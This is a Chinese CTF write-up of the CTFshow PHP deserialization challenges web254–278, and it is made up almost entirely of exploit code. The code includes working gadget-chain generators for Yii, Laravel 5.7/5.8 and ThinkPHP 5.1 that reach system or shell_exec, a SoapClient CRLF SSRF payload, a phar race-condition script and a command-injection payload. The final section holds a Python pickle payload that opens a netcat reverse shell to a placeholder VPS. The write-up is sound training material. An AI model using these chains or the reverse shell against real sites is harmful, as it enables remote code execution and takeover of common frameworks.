会下雪的晴天
会下雪的晴天

CTFshow 反序列化wp

title: CTFshow 反序列化wp
date: 2020-12-02 20:03:53
categories: ctfshow
link:https://yq1ng.github.io/

说一些有的没的:
payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码
shellcode(可提权代码) 对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload来做一些事情
exp (Exploit )漏洞利用,一般是个demo程序
poc(Proof of Concept)漏洞证明,一般就是个样本 用来证明和复现
vul:(Vulnerability) :漏洞
Pwn:是一个黑客语法的俚语词 ,是指攻破设备或者系统、
作者:一个人的朝圣之路
链接:https://www.zhihu.com/question/26053378/answer/186414523

  • web254
  • web255
  • web256
  • web257
  • web258
  • web259
  • web260
  • web261
  • web262
  • web263
  • web264
  • web265
  • web266
  • web267
  • web268
  • web269
  • web270
  • web271
  • web272 | 273
  • web274
  • web275
  • web276
  • web277 | 278

web254

没啥说的,两组xxxxxx,看不懂的建议移步php教程

web255

cookie的反序列,记得url编码,第一题写个简单exp,反序列化看情况总结一下是啥,现在懒得动23333


# @Author:      yq1ng
# @Date:        2020-12-2 20:00
# @challenges: web255

class ctfShowUser{
     
	public $isVip=true;
}
$a = new ctfShowUser();
echo(urlencode(serialize($a)));

web256



/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: [email protected]
# @link: https://ctfer.com

*/

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
     
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
     
        return $this->isVip;
    }
    public function login($u,$p){
     
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
     
        if($this->isVip){
     
            global $flag;
            if($this->username!==$this->password){
     
                    echo "your flag is ".$flag;
              }
        }else{
     
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
     
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
     
        if($user->checkVip()){
     
            $user->vipOneKeyGetFlag();
        }
    }else{
     
        echo "no vip,no flag";
    }
}

看清楚,判断了user!==pass,所以反序列化自己该个user值就好


# @Author:      yq1ng
# @Date:        2020-12-2 20:05
# @challenges: web256

class ctfShowUser{
     
	public $username='yq1ng';
    public $password='xxxxxx';
	public $isVip=true;
}
$a = new ctfShowUser();
echo(urlencode(serialize($a)));

web257

一开始想考wekeup,后来群主说现在php8了,就不考了其实docker没找到
CVE-2016-7124漏洞,当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

public function __wakeup(){
     
        $this->username=md5(mt_rand());
        $this->password=md5(mt_rand());
    }

改成链子了,很短,就两个



/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 20:33:07
# @email: [email protected]
# @link: https://ctfer.com

*/

error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
     
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
     
        $this->class=new info();
    }
    public function login($u,$p){
     
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
     
        $this->class->getInfo();
    }

}

class info{
     
    private $user='xxxxxx';
    public function getInfo(){
     
        return $this->user;
    }
}

class backDoor{
     
    private $code;
    public function getInfo(){
     
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
     
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

反序列化触发back函数就行,exp:


# @Author:      yq1ng
# @Date:        2020-12-2 21:20
# @challenges: web257

class ctfShowUser{
     
	private $class = 'backDoor';

    public function __construct(){
     
    	$this->class=new backDoor();
    }
}

class backDoor{
     
    private $code = 'system("cat `ls`");';
}

$a = new ctfShowUser();

echo(serialize($a)."\n");
echo("\n".urlencode(serialize($a))."\n");

经admin师傅发的payload改了下exp


# @Author:      yq1ng
# @Date:        2020-12-2 21:20
# @challenges: web257

class ctfShowUser{
     
	public $class = 'yq1ng';//随意,但是要改为public
}

class backDoor{
     
    public $code = 'system("cat `ls`");';
}

$a = new ctfShowUser();
$b = new backDoor();
$a->class = $b;

echo(serialize($a)."\n");
echo("\n".urlencode(serialize($a))."\n");

web258

对user有了过滤,类似xctf的Web_php_unserialize

if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
     
        $user = unserialize($_COOKIE['user']);
    }

解释:
[oc] --> 匹配内部某个字符
\d --> 匹配数字
+ --> 匹配至少一个

用+号绕过正则,上一题生成的payload里面的两个O:后面加一个+,最终payload:%4f%3a%2b%31%31%3a%22%63%74%66%53%68%6f%77%55%73%65%72%22%3a%31%3a%7b%73%3a%35%3a%22%63%6c%61%73%73%22%3b%4f%3a%2b%38%3a%22%62%61%63%6b%44%6f%6f%72%22%3a%31%3a%7b%73%3a%34%3a%22%63%6f%64%65%22%3b%73%3a%31%39%3a%22%73%79%73%74%65%6d%28%22%63%61%74%20%60%6c%73%60%22%29%3b%22%3b%7d%7d

web259

这就是传说中的SoapCLient+CRLF组合拳
一开始环境坏了没回显,和群主测试许久,最后重新部署了,更改flag.php如下:

$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip = array_pop($xff);


if($ip!=='127.0.0.1'){
     
	die('error');
}else{
     
	$token = $_POST['token'];
	if($token=='ctfshow'){
     
		file_put_contents('flag.txt',$flag);
	}
}

详细的我就不写辣,大家可以看看Y4佬的blog,exp如下:


# @Author:      yq1ng
# @Date:        2020-12-3 00:00
# @challenges: web259

$headers = array(
    'X-Forwarded-For: 127.0.0.1,127.0.0.1,127.0.0.1,127.0.0.1,127.0.0.1',
    'Cookie: UM_distinctid=175da3584e611e-004301709460d3-930346c-100200-175da3584e889'
);
$post_string = 'token=ctfshow';

$soapClient = new SoapClient(
	null,
	array(
		'user_agent' => "m3w\x0D\x0Ahello: 1\x0D\x0AContent-Type: application/x-www-form-urlencoded\x0D\x0A".join("\x0D\x0A",$headers)."\x0D\x0AContent-Length: ". (string)strlen($post_string)."\x0D\x0A\x0D\x0A".$post_string, 
		'location' => "http://127.0.0.1/flag.php",
		'uri' => 'http://127.0.0.1/flag.php'
	)
);

echo (urlencode(serialize($soapClient)));

web260


error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

if(preg_match('/ctfshow_i_love_36D/',serialize($_GET['ctfshow']))){
     
    echo $flag;
}

payload: ?ctfshow=ctfshow_i_love_36D

web261

。。。和群主研究了好久,他那边可以打通,我这边不行,遂放弃

web262

看注释,有message.php提示,直接构造exp放到cookie即可


/**
 * @ Author: yq1ng
 * @ Date:  2020-12-29
 * @Changes: web262
 */
class message{
     
    public $token = "admin";
}
$yq1ng = new message;
echo base64_encode(serialize($yq1ng));

正常做法:str_replace('fuck', 'loveU', serialize($msg))此处导致序列化后的字符串遭到更改,经过特定payload可以实现字符串逃逸,参考安洵杯2019

任何具有一定结构的数据,如果经过了某些处理而把结构体本身的结构给打乱了,则有可能会产生漏洞 --D0g3

我们需要$token='admin';经过序列化是这样的s:5:"token";s:5:"admin";,加上闭合";s:5:"token";s:5:"admin";}一个27个字符,每次替换增加一个字符,需要27个fuck吃掉构造函数的$token='user';
payload:?f=yq1ng&m=yq1ng&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}之后在访问message.php

web263

session反序列化
文章一、文章二

sql失败,简单fuzz了,也不会是sql,毕竟是反序列化系列,URL/www.zip存在源码泄露,下载后用了seay源码审计系统我是蓝狗,发现在inc.php的第45行有file_put_contents,可写木马,user控制文件名,pass写一句话

class User{
     
    public $username;
    public $password;
    public $status;
    function __construct($username,$password){
     
        $this->username = $username;
        $this->password = $password;
    }
    function setStatus($s){
     
        $this->status=$s;
    }
    function __destruct(){
     
        file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
    }
}

先访问index.php开启session会话,修改cookie[limit]为exp生成的字符串,再访问check.php写入文件,最后访问log-yq1ng.php


/**
 * @ Author: yq1ng
 * @ Date:  2020-12-29
 * @Changes: web263
 */
class User{
     
    public $username;
    public $password;

}

$yq1ng = new user;
$yq1ng->username='yq1ng.php';
$yq1ng->password='';
echo base64_encode('|'.serialize($yq1ng));

web264

乍一看和262一样,但是这个是session会话,使用262第二种解法,再在cookie中添加cookie[msg]=‘yq1ng’

//添加cookie[msg]原因
if(isset($_COOKIE['msg']))

web265



/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: [email protected]
# @link: https://ctfer.com

*/

error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
     
    public $token;
    public $password;

    public function __construct($t,$p){
     
        $this->token=$t;
        $this->password = $p;
    }
    public function login(){
     
        return $this->token===$this->password;
    }
}

$ctfshow = unserialize($_GET['ctfshow']);
$ctfshow->token=md5(mt_rand());

if($ctfshow->login()){
     
    echo $flag;
}



/*
# -*- coding: utf-8 -*-
# @Author:  yq1ng
# @Date:    2020-12-08 16:30
# @Changes: web265
*/

class ctfshowAdmin{
     
    public $token = "vip";
    public $password = "vip";
}

$yq1ng = new ctfshowAdmin();
$yq1ng->password =& $yq1ng->token;//引用
echo urlencode(serialize($yq1ng));

web266


highlight_file(__FILE__);

include('flag.php');
$cs = file_get_contents('php://input');


class ctfshow{
     
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function __construct($u,$p){
     
        $this->username=$u;
        $this->password=$p;
    }
    public function login(){
     
        return $this->username===$this->password;
    }
    public function __toString(){
     
        return $this->username;
    }
    public function __destruct(){
     
        global $flag;
        echo $flag;
    }
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
     
    throw new Exception("Error $ctfshowo",1);
}



/*
# -*- coding: utf-8 -*-
# @Author:  yq1ng
# @Date:    2020-12-08 16:42
# @Changes: web266
*/

class ctfshow{
     
    public $username='xxxxxx';
    public $password='xxxxxx';
}

$yq1ng = new ctfshow();
echo serialize($yq1ng);

直接在hackbar里面提交是不行的,没有参数自然传不上去,要用bp,因为最后两行代码ban了小写的ctfshow,POST的时候大写绕过
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Qb9kXjZO-1609600341601)(https://raw.githubusercontent.com/yq1ng/blog/master/CTFShow/image.t5klgajabys.png)]
but,why?本地测试对象字符串大小写随意更改都可以正常反序列化



class ctfshowA{
     
    public $username='xxxxxx';
    public $password='xxxxxx';
}

//$yq1ng = new ctfshowA();
//echo (serialize($yq1ng));
var_dump(unserialize('O:8:"ctfshowa":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}'));
var_dump(unserialize('O:8:"CtfshowA":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}'));

在Google一番后倒是找到一个php常识 -----> PHP大小写:函数名和类名不区分,变量名区分,参考链接点此,测试了一下,还真是,测试代码:



class ctfshow{
     
    public $username='xxxxxx';
    public $password='xxxxxx';
}

class Ctfshow{
     
	public $username='xxxxxx';
    public $password='xxxxxx';
}

//丢Error:Fatal error: Cannot declare class Ctfshow, because the name is already in use in F:\CTF\script\php\test.php on line 14
//该类名已经使用

涨姿势了

web267

yii框架的反序列化,本题无回显
参考:https://www.cnblogs.com/thresh/p/13743081.html
多谢Y4与群主帮助

弱口令登陆,在about页面下有藏的够深,与url拼接,这里不是直接?xxx,而是直接在最后&view-source,why?看看yii路由是什么样的,传送门,之后sys被ban(反正我是不能用)参考群主的payload用的shell_exec,最后exp



/*
# -*- coding: utf-8 -*-
# @Author:  
# @Date:    2020-12-09
# @Changes: web267
*/

namespace yii\rest{
     
    class CreateAction{
     
        public $checkAccess;
        public $id;

        public function __construct(){
     
            $this->checkAccess = 'exec';
            $this->id = 'cp /flag /var/www/html/basic/web/yq1ng.txt';
        }
    }
}

namespace Faker{
     
    use yii\rest\CreateAction;

    class Generator{
     
        protected $formatters;

        public function __construct(){
     
            $this->formatters['close'] = [new CreateAction, 'run'];
        }
    }
}

namespace yii\db{
     
    use Faker\Generator;

    class BatchQueryResult{
     
        private $_dataReader;

        public function __construct(){
     
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
     
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}

payload:URL/index.php?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6MTA6InNoZWxsX2V4ZWMiO3M6MjoiaWQiO3M6NDI6ImNwIC9mbGFnIC92YXIvd3d3L2h0bWwvYmFzaWMvd2ViL3lxMW5nLnR4dCI7fWk6MTtzOjM6InJ1biI7fX19fQ==,路由还是通过r,有机会复现一波yii框架,最后访问URL/yq1ng.txt

web268

上一题的exp,过滤了flag,用cat /fl* > yq1ng.txt,默认生成文件在当前目录,所以直接访问URL/yq1ng.txt即可

web269

换poc了,参考Thresh|师傅的poc4,这次不能用cat了,直接cp /f* yq1ng.txt走一波


namespace yii\rest {
     
    class Action
    {
     
        public $checkAccess;
    }
    class IndexAction
    {
     
        public function __construct($func, $param)
        {
     
            $this->checkAccess = $func;
            $this->id = $param;
        }
    }
}
namespace yii\web {
     
    abstract class MultiFieldSession
    {
     
        public $writeCallback;
    }
    class DbSession extends MultiFieldSession
    {
     
        public function __construct($func, $param)
        {
     
            $this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];
        }
    }
}
namespace yii\db {
     
    use yii\base\BaseObject;
    class BatchQueryResult
    {
     
        private $_dataReader;
        public function __construct($func, $param)
        {
     
            $this->_dataReader = new \yii\web\DbSession($func, $param);
        }
    }
}
namespace {
     
    $exp = new \yii\db\BatchQueryResult('shell_exec', 'cp /f* yq1ng.txt');
    echo(base64_encode(serialize($exp)));
}

web270

上一题的exp

web271

参考博客点此,laravel 5.7的反序列化rce


namespace Illuminate\Foundation\Testing{
     
	class PendingCommand{
     
		protected $command;
		protected $parameters;
		protected $app;
		public $test;

		public function __construct($command, $parameters,$class,$app)
	    {
     
	        $this->command = $command;
	        $this->parameters = $parameters;
	        $this->test=$class;
	        $this->app=$app;
	    }
	}
}

namespace Illuminate\Auth{
     
	class GenericUser{
     
		protected $attributes;
		public function __construct(array $attributes){
     
	        $this->attributes = $attributes;
	    }
	}
}


namespace Illuminate\Foundation{
     
	class Application{
     
		protected $hasBeenBootstrapped = false;
		protected $bindings;

		public function __construct($bind){
     
			$this->bindings=$bind;
		}
	}
}

namespace{
     
	echo urlencode(serialize(new Illuminate\Foundation\Testing\PendingCommand("system",array('cat /flag'),new Illuminate\Auth\GenericUser(array("expectedOutput"=>array("0"=>"1"),"expectedQuestions"=>array("0"=>"1"))),new Illuminate\Foundation\Application(array("Illuminate\Contracts\Console\Kernel"=>array("concrete"=>"Illuminate\Foundation\Application"))))));
}
?>

web272 | 273

上面5.7的不行了,用5.8的版本,参考,一开始没用成,报错了,看了yu师傅的博客才知道用exit提前结束脚本,tql


namespace PhpParser\Node\Scalar\MagicConst{
     
    class Line {
     }
}
namespace Mockery\Generator{
     
    class MockDefinition
    {
     
        protected $config;
        protected $code;

        public function __construct($config, $code)
        {
     
            $this->config = $config;
            $this->code = $code;
        }
    }
}
namespace Mockery\Loader{
     
    class EvalLoader{
     }
}
namespace Illuminate\Bus{
     
    class Dispatcher
    {
     
        protected $queueResolver;
        public function __construct($queueResolver)
        {
     
            $this->queueResolver = $queueResolver;
        }
    }
}
namespace Illuminate\Foundation\Console{
     
    class QueuedCommand
    {
     
        public $connection;
        public function __construct($connection)
        {
     
            $this->connection = $connection;
        }
    }
}
namespace Illuminate\Broadcasting{
     
    class PendingBroadcast
    {
     
        protected $events;
        protected $event;
        public function __construct($events, $event)
        {
     
            $this->events = $events;
            $this->event = $event;
        }
    }
}
namespace{
     
    $line = new PhpParser\Node\Scalar\MagicConst\Line();
    $mockdefinition = new Mockery\Generator\MockDefinition($line,"");
    $evalloader = new Mockery\Loader\EvalLoader();
    $dispatcher = new Illuminate\Bus\Dispatcher(array($evalloader,'load'));
    $queuedcommand = new Illuminate\Foundation\Console\QueuedCommand($mockdefinition);
    $pendingbroadcast = new Illuminate\Broadcasting\PendingBroadcast($dispatcher,$queuedcommand);
    echo urlencode(serialize($pendingbroadcast));
}
?>

web274

ThinkPHP V5.1,直接搜,我偷懒了嘿嘿,用的yu师傅找到的博客,用法:?lin=cat /f*&data=


namespace think;
abstract class Model{
     
    protected $append = [];
    private $data = [];
    function __construct(){
     
        $this->append = ["lin"=>["calc.exe","calc"]];
        $this->data = ["lin"=>new Request()];
    }
}
class Request
{
     
    protected $hook = [];
    protected $filter = "system";
    protected $config = [
        // 表单ajax伪装变量
        'var_ajax'         => '_ajax',  
    ];
    function __construct(){
     
        $this->filter = "system";
        $this->config = ["var_ajax"=>'lin'];
        $this->hook = ["visible"=>[$this,"isAjax"]];
    }
}


namespace think\process\pipes;

use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
     
    private $files = [];

    public function __construct()
    {
     
        $this->files=[new Pivot()];
    }
}
namespace think\model;

use think\Model;

class Pivot extends Model
{
     
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>

web275

进来就看到危险函数

if($this->evilfile){
     
    system('rm '.$this->filename);
}

把evilfile置为true即可,payload:

GET: ?fn=;cat f*
POST: yq1ng=flag//随意,值是flag/php就行

POST怎么接收? $content = file_get_contents('php://input');

web276

emm我失败了,有空在填坑吧太菜了先预习期末考了
这个admin应该是反序列化整出来的,但是没反序列化点,参考yu师傅的
phar+条件竞争



class filter{
     
    public $filename = "1|cat f*";
    public $filecontent;
    public $evilfile = true;
    public $admin = true;
}

$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("");

$o = new filter();
$phar->setMetadata($o);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

import requests
import threading
import base64
url = ''

f = open('./phar.phar', 'rb')

data = f.read()
flag = False

def work1():
    requests.post(url+"?fn=a", data=data)


def work2():
    global flag
    r = requests.post(url+"?fn=phar://phar.phar/", data="")
    if "flag{" in r.text and flag is False:
        print(base64.b64encode(r.text.encode()))
        flag = True

while flag is False:
    a = threading.Thread(target=work1)
    b = threading.Thread(target=work2)
    a.start()
    b.start()

web277 | 278

源码有:,搜了一下是python的反序列化,推荐K0rz3n师傅写的,很详细

import pickle
import base64
class A(object):
    def __reduce__(self):
        return(eval,('__import__("os").popen("nc vpsip vps-port -e /bin/sh").read()',))
a=A()
test=pickle.dumps(a)
print(base64.b64encode(test))

你可能感兴趣的:(ctfshow)

  • ctfshow web入门 ssrf web351~web360 kikkeve ctfshowphpweb安全安全
    目录SSRF基础web351web352、353web354web355web356web357web358web359web360SSRF基础SSRF(Server-SideRequestForgery:服务器端请求伪造)就是让服务器去请求服务器的资源,因为我们远程请求不到。curl_init():初始curl会话curl_setopt():会话设置curl_exec():执行curl会话,获取
  • ctfshow-web入门-sql注入-web172 HkD01L ctfshowSQL注入sql数据库
    题目描述查询语句//拼接sql语句查找指定ID用户$sql="selectusername,passwordfromctfshow_user2whereusername!='flag'andid='".$_GET['id']."'limit1;";返回逻辑//检查结果是否有flagif($row->
  • ctfshow-Web入门-58~74wp 赛博雨天 ctfshowweb
    bloghttp://blog.yutian233.xyz/Web58-65POSTc=include($_GET['url']);GET/?url=php://filter/read=convert.base64-encode/resource=flag.phpWeb66-70flag换位置了/flag.txtPayload还可以用Web71importrequestsurl="http://c
  • ctfshow之web52~web54 pink鱼 linux运维服务器
    web52if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag||[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\/dev/null2>&1");}}else{highlight_file(__FIL
  • ctfshow [web] 文件上传 156--160 D2490 CTF前端php服务器
    Web156.user.ini文件可以正常上传,可以先上传.user.ini文件然后再上传写有木马的png图片,然后访问/upload页面Web157可以上传.user.ini文件,new.png也可以正常上传,操作和上题一样。Web158操作和上题一样。一句话木马:GIF89aWeb159可以上传user.ini文件,不过木马上传失败了。看了一眼题解,发现括号被过滤了,需要用反引号执行命令。:G
  • 文件上传(ctfshow,upload-labs,文件上传字典生成) YnG_t0 webphp安全web安全
    准备了10几天的美亚杯,最后结果也是很满意的,拿到了一等奖,不过还是得继续学习web,冲冲冲!(全部重新截图有点麻烦,有的图借用了其他大佬的)ctfshowweb151-web152本题即绕过前端验证,只需上传一个png图片(图片马,普通图片需添加一句话),在burp截断时修改content-type为php即可绕过,再进入文件目录,利用命令执行得到flag制作图片马的方法:用一张小点的图片和一句
  • CTFshow Web入门 文件上传 一夜至秋. web安全
    目录web151web152web153web154web155web156web157web158、web159web160web161web162web163web164web165web166web167web168web169web170web1511.写马改后缀为png上传,抓包修改文件信息回显路径,蚁剑连接2.先构造一句话木马php文件修改前端,然后上传php文件进入路径POST传参,
  • CTFshow——web入门——文件上传 _暖冬 CTFshow前端phpweb安全
    web入门—文件上传web151web152web153web154web155web156web157web158web159web160web161web162、web163web164web165web166web167web168web169web170web151前端校验修改上传格式为php,上传一句话马,蚁剑连接得flagweb152后端校验上传一句话,png文件抓包修改文件名后缀为p
  • CTFshow 文件上传 web158 Kradress CTFshowphp
    目录思路总结思路直接在burp里面改target和host的值,或者在本地发包成功上传.user.iniauto_prepend_file=shell.png发现上题的可以直接用,直接白嫖了shell.png总结…
  • CTFshow web(文件上传158-161) 补天阁 前端文件上传文件包含命令执行web安全
    web158知识点:auto_append_file是PHP配置选项之一,在PHP脚本执行结束后自动追加执行指定的文件。当auto_append_file配置被设置为一个文件路径时,PHP将在执行完脚本文件的所有代码后,自动加载并执行指定的文件。这个配置选项可以用来在每个PHP脚本的结尾处执行一些共享的代码逻辑,例如清理工作、记录日志或执行一些全局操作。这样,就不必在每个脚本中显式编写和调用相同的
  • ctf刷题 ctfshow【网鼎杯】 路向阳_ CTF学习网络安全
    Php-3、java-3、目录一、网鼎杯-青龙组-web--AreUserialZ1、源码见下:serialzcopy3、绕过语法详解:4、尝试绕过:二、php特性三、php反序列化漏洞四、Buuctf一、网鼎杯-青龙组-web--AreUserialZBuuctf1、源码见下:serialzcopyPhp反序列化:思路:先阅读源码,在分析思路//大致思路:新建一个对象filenameflag.p
  • 刷题之旅第46站,CTFshow 内部赛web03 圆圈勾勒成指纹 刷题之旅100站nginxcentosjava安全
    感谢ctfshow平台提供题目打开题目,是一张图片,猜测是连接菜刀,密码是cai连接成功了。在根目录发现flag,但是没有权限打开。需要提权,根据提示,漏洞大约每两分钟触发一次,查看一下定时任务。cat/etc/crontab看到了一个每1分钟执行一次的任务,重启nginx。查资料找到漏洞编号:SSV-92538https://www.seebug.org/vuldb/ssvid-92538把po
  • ctfshow刷题(Java反序列化) V3g3t4ble java开发语言
    CTFshowJava反序列化web846urldns链importjava.io.ByteArrayOutputStream;importjava.io.IOException;importjava.io.ObjectOutput;importjava.io.ObjectOutputStream;importjava.lang.reflect.Field;importjava.net.URL;i
  • 【Web】CTFSHOW java刷题记录(全) Z3r4y javactfshowstruts2strutsrcecveweb
    目录web279web280web281web282web283web284web285web286web287web288web289web290web291web292web293web294web295web296web297web298web299web300web279题目提示url里告诉我们是S2-001直接进行一个exp的搜S2-001漏洞分析-CSDN博客payload:%{#a=
  • 安全基础~通用漏洞6 `流年づ 安全学习安全
    文章目录知识补充XXE文件包含CTFshow闯关知识补充XML格式(一种数据传输格式,现在被JSON取代):https://xz.aliyun.com/t/6887XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素DTD定义合法的XML文档构建模块,它使用一系列合法的元素来定义文档的结构。DTD可被成行地声明于XML文档中,也可作为一个外部引用。参考文章XXEXML外部实体注入(也
  • ctfshow-web29~40-WP 五行缺你94 各大CTF平台WPctf
    web29if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/flag/i",$c)){eval($c);}}else{highlight_file(__FILE__);}首先先system(“ls”);查看一下文件既然过滤了flag,那我们就fla*的形式进行匹配,结合tac命令输出flag.php文件内容
  • CTFshow web(文件上传151-154) 补天阁 前端php开发语言CTFshowweb安全
    web151哈,都直接送嘴边了,前端检测领域的问题,那就改前端啊,作者都直接提示了!第一种方法也是最好用的就是直接把前端内容的png改成php就好这里教大家一个非常好用的技巧,可以极大节省你的时间,因为代码比较多,你不可能一个个去翻看,所以把鼠标靠近上传图片,然后右键检查元素,就会自动帮你定位,接下来把png改成php,就可以直接上传一句话木马ps:当然了,你不直接在前端改也是可以的,这里也是可以
  • CTFshow web(php文件上传155-158) 补天阁 php开发语言CTFshowweb安全文件上传
    web155老样子,还是那个后端检测。知识点:auto_append_file是PHP配置选项之一,在PHP脚本执行结束后自动追加执行指定的文件。当auto_append_file配置被设置为一个文件路径时,PHP将在执行完脚本文件的所有代码后,自动加载并执行指定的文件。这个配置选项可以用来在每个PHP脚本的结尾处执行一些共享的代码逻辑,例如清理工作、记录日志或执行一些全局操作。这样,就不必在每个
  • CTFshow web(php命令执行 68-71) 补天阁 php开发语言CTFshowweb安全
    web68还是那句话,没看到flag在哪,那就优先找到flag位置这里c=var_dump(scandir("/"));直接输出根目录的位置,然后查看源代码,发现flag位置为flag.txt知道flag在根目录下面的flag.txt直接访问就好了c=include('/flag.txt');web69payload:c=include('/flag.txt');上题payload没有禁用,直接白
  • CTFshow web(php命令执行59-67) 补天阁 php开发语言CTFshowweb安全
    web59
  • CTFSHOW web 89-100 22的卡卡 GITBOOK前端安全ctfshow
    这边建议去我的gitbook或者github看观感更好(图片更完整)github:https://github.com/kakaandhanhan/cybersecurity_knowledge_book-gitbook.22kaka.fungitbook:http://22kaka.funCTFSHOWPHP特性(1)WEB89①代码解释
  • 【ctfshow】文件上传web151-170wp Sunlight_614 CTFshow前端php开发语言
    文件上传web151-170web1511.编写一句话木马上传2.修改前端验证3.在蚁剑上找flagweb1521.修改前端验证2.burp抓包后修改MIME3.在蚁剑上找flagweb1531.修改前端验证2.上传ini配置文件3.上传1.txt文件4.访问upload目录可进行命令执行web154-web1581.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagw
  • ctfshow--web入门--文件上传 SuperMan529 CTFshow前端web安全
    ctfshow–web入门–文件上传目录标题ctfshow--web入门--文件上传web151(前端校验)web152(content-type)web153(.user.ini)web154(内容检测'php')web155(内容检测'php')web156(内容检测'[')web157(内容检测'php''[]''{}'';')web158(文件检测'php''{''['';''log')w
  • ctfshow 文件上传 web151~170 succ3 ctfshow_web入门phpweb安全
    目录web151web152web153web154web155web156web157~159web160web161web162~163web164web165web166web167web168web169web170参考:web151上传提示,前端验证上传.jpg文件然后抓包,改文件名为.php,加入一句话木马。upload/1.php?1=system("cat/var/www/html
  • CTFshow-文件上传 南桥几经秋i 安全web安全
    ctfshow-web-151这题就一个前端校验,直接在前端png改成php,上传木马,连蚁剑找flagctfshow-web-152上传文件bp抓包,`Content-Type`改成image/png再post:muma=system("tac../flag.php");ctfshow-web-153.user.ini留后门进入/upload发现有东西,说明是有一个index.php,那么可以改
  • ctfshow---文件上传 T6... CTFphp开发语言
    来到文件上传了web151-152前端过滤,抓包修改下后缀即可访问upload下1.phpweb153上传一个.user.ini,内容是auto_prepend_file=1.jpg,这是一个配置文件,能指定文件把它当作php执行再上传一个1.jpg,里面是一句话即可这里有个注意的点是上传木马后是访问/upload/这个目录web154-155上一题的做法,只是过滤了php,一句话里面用访问,随便
  • ctfshow学习记录-web入门(文件上传151-160) 九枕 ctf-web#ctfshow-web前端学习php
    目录web151web152web153web154-145web156web157-159web160建议文件上传的题一口气肝完。burp抓包直接修改url,就可以重复使用,省事。web151提示:前台校验不可靠解答:有个前台的后缀校验,修改上传文件的后缀为png,抓包修改后缀即可。上传成功,可以蚁剑连接,或者是post执行php语句也可以。jz=system('cat../flag.php')
  • ctfshow-php特性(web102-web115) 网安小t PHP特性CTFSHOW渗透测试php特性网络安全
    目录web102web103web104web105web106web107web108web109web110web111web112web113web114web115实践是检验真理的要多多尝试web102过滤了payload中php且不区分大小写这么一看对我们没影响尝试一波发现确实没影响上一道题其实不是那么做的上一道题就是让你写任意的木马但是环境配成7.1了只能按照这道题的方式去做就算上一题
  • ctfshow-文件上传(web151-web161) 网安小t CTFSHOW文件上传网络安全渗透测试文件上传文件上传漏洞php代码
    目录web151web152web153web154web155web156web157web158web159web160web161web151提示前台验证不可靠那限制条件估计就是在前端设置的上传php小马后弹出了窗口说不支持的格式查看源码这一条很关键这种不懂直接ai搜意思就是限制了上传类型允许的后缀格式为png我们直接修改并且上传小马给出了上传路径访问传参即可得出flag方法二因为是前端验证
  • CTFshow web(php命令执行 50-54) 补天阁 前端phpCTFshowweb安全
